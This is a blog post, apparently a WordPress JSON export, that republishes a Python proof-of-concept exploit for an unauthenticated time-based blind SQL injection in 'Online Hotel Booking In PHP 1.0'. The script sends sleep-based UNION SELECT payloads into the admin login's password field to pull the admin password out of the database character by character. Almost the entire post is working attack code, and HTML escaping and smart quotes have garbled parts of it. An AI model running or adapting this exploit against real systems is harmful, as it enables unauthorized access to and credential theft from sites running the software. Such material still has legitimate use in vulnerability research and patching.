# Exploit Title: Online Hotel Booking In PHP 1.0 – Blind SQL Injection (Unauthenticated)
# Google Dork: n\/a
# Date: 04\/02\/2024
# Exploit Author: Gian Paris C. Agsam
# Vendor Homepage: https:\/\/github.com\/projectworldsofficial
# Software Link: https:\/\/projectworlds.in\/wp-content\/uploads\/2019\/06\/hotel-booking.zip
# Version: 1.0
# Tested on: Apache\/2.4.58 (Debian) \/ PHP 8.2.12
# CVE : n\/a<\/p>\n
import requests
import argparse
from colorama import (Fore as F, Back as B, Style as S)<\/p>\n
BR,FT,FR,FG,FY,FB,FM,FC,ST,SD,SB,FW = B.RED,F.RESET,F.RED,F.GREEN,F.YELLOW,F.BLUE,F.MAGENTA,F.CYAN,S.RESET_ALL,S.DIM,S.BRIGHT,F.WHITE<\/p>\n
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
proxies = {‘http’: ‘http:\/\/127.0.0.1:8080’, ‘https’: ‘http:\/\/127.0.0.1:8080’}<\/p>\n
parser = argparse.ArgumentParser(description=’Exploit Blind SQL Injection’)
parser.add_argument(‘-u’, ‘–url’, help=”)
args = parser.parse_args()<\/p>\n
def banner():
print(f”””{FR}
\u00b7\u2584\u2584\u2584\u00b7\u2584\u2584\u2584.\u2584\u2584 \u00b7 \u2584\u2584\u2584 . \u2584\u2584\u00b7 \u00b7\u2584\u2584\u2584\u2584 \u2584\u2584\u2584 \u25aa \u00b7\u2584\u2584\u2584\u2584
\u25aa \u2590\u2584\u2584\u00b7\u2590\u2584\u2584\u00b7\u2590\u2588 \u2580. \u2580\u2584.\u2580\u00b7\u2590\u2588 \u258c\u25aa\u2588\u2588\u25aa \u2588\u2588 \u2580\u2584 \u2588\u00b7\u25aa \u2588\u2588 \u2588\u2588\u25aa \u2588\u2588
\u2584\u2588\u2580\u2584 \u2588\u2588\u25aa \u2588\u2588\u25aa \u2584\u2580\u2580\u2580\u2588\u2584\u2590\u2580\u2580\u25aa\u2584\u2588\u2588 \u2584\u2584\u2590\u2588\u00b7 \u2590\u2588\u258c\u2590\u2580\u2580\u2584 \u2584\u2588\u2580\u2584 \u2590\u2588\u00b7\u2590\u2588\u00b7 \u2590\u2588\u258c
\u2590\u2588\u258c.\u2590\u258c\u2588\u2588\u258c.\u2588\u2588\u258c.\u2590\u2588\u2584\u25aa\u2590\u2588\u2590\u2588\u2584\u2584\u258c\u2590\u2588\u2588\u2588\u258c\u2588\u2588. \u2588\u2588 \u2590\u2588\u2022\u2588\u258c\u2590\u2588\u258c.\u2590\u258c\u2590\u2588\u258c\u2588\u2588. \u2588\u2588
\u2580\u2588\u2584\u2580\u25aa\u2580\u2580\u2580 \u2580\u2580\u2580 \u2580\u2580\u2580\u2580 \u2580\u2580\u2580 \u00b7\u2580\u2580\u2580 \u2580\u2580\u2580\u2580\u2580\u2022 .\u2580 \u2580 \u2580\u2588\u2584\u2580\u25aa\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2022
Github: https:\/\/github.com\/offensive-droid
{FW}
“””)<\/p>\n
# Define the characters to test
chars = [
‘a’, ‘b’, ‘c’, ‘d’, ‘e’, ‘f’, ‘g’, ‘h’, ‘i’, ‘j’, ‘k’, ‘l’, ‘m’, ‘n’, ‘o’,
‘p’, ‘q’, ‘r’, ‘s’, ‘t’, ‘u’, ‘v’, ‘w’, ‘x’, ‘y’, ‘z’, ‘A’, ‘B’, ‘C’, ‘D’,
‘E’, ‘F’, ‘G’, ‘H’, ‘I’, ‘J’, ‘K’, ‘L’, ‘M’, ‘N’, ‘O’, ‘P’, ‘Q’, ‘R’, ‘S’,
‘T’, ‘U’, ‘V’, ‘W’, ‘X’, ‘Y’, ‘Z’, ‘0’, ‘1’, ‘2’, ‘3’, ‘4’, ‘5’, ‘6’, ‘7’,
‘8’, ‘9’, ‘@’, ‘#’
]\n
def sqliPayload(char, position, userid, column, table):
sqli = ‘admin\\’ UNION SELECT IF(SUBSTRING(‘
sqli += str(column) + ‘,’
sqli += str(position) + ‘,1) = \\”
sqli += str(char) + ‘\\’,sleep(3),null) FROM ‘
sqli += str(table) + ‘ WHERE uname=”admin”\\”
return sqli<\/p>\n
def postRequest(URL, sqliReq, char, position):
sqliURL = URL
params = {“emailusername”: “admin”, “password”: sqliReq, “submit”: “Login”}
req = requests.post(url=sqliURL, data=params, verify=False, proxies=proxies, timeout=10)
if req.elapsed.total_seconds() >= 2:
print(“{} : {}”.format(char, req.elapsed.total_seconds()))
return char<\/p>\n
return ”<\/p>\n
def theHarvester(target, CHARS, url):
#print(“Retrieving: {} {} {}”.format(target[‘table’], target[‘column’], target[‘id’]))
print(“Retrieving admin password”.format(target[‘table’], target[‘column’], target[‘id’]))
position = 1
full_pass = “”
while position < 5:
for char in CHARS:
sqliReq = sqliPayload(char, position, target[‘id’], target[‘column’], target[‘table’])
found_char = postRequest(url, sqliReq, char, position)
full_pass += found_char
position += 1
return full_pass<\/p>\n
if __name__ == “__main__”:
banner()
HOST = str(args.url)
PATH = HOST + “\/hotel booking\/admin\/login.php”
adminPassword = {“id”: “1”, “table”: “manager”, “column”: “upass”}
adminPass = theHarvester(adminPassword, chars, PATH)
print(“Admin Password:”, adminPass)<\/p>\n","protected":false},"excerpt":{"rendered":"
# Exploit Title: Online Hotel Booking In PHP 1.0 – Blind SQL Injection (Unauthenticated)# Google Dork: n\/a# Date: 04\/02\/2024# Exploit Author: Gian Paris C. Agsam# Vendor Homepage: https:\/\/github.com\/projectworldsofficial# Software Link: https:\/\/projectworlds.in\/wp-content\/uploads\/2019\/06\/hotel-booking.zip# Version: 1.0# Tested on: Apache\/2.4.58 (Debian) \/ PHP 8.2.12# CVE : n\/a import requestsimport argparsefrom colorama import (Fore as F, Back as B, Style …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-55806","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/55806","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=55806"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/55806\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=55806"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=55806"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=55806"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}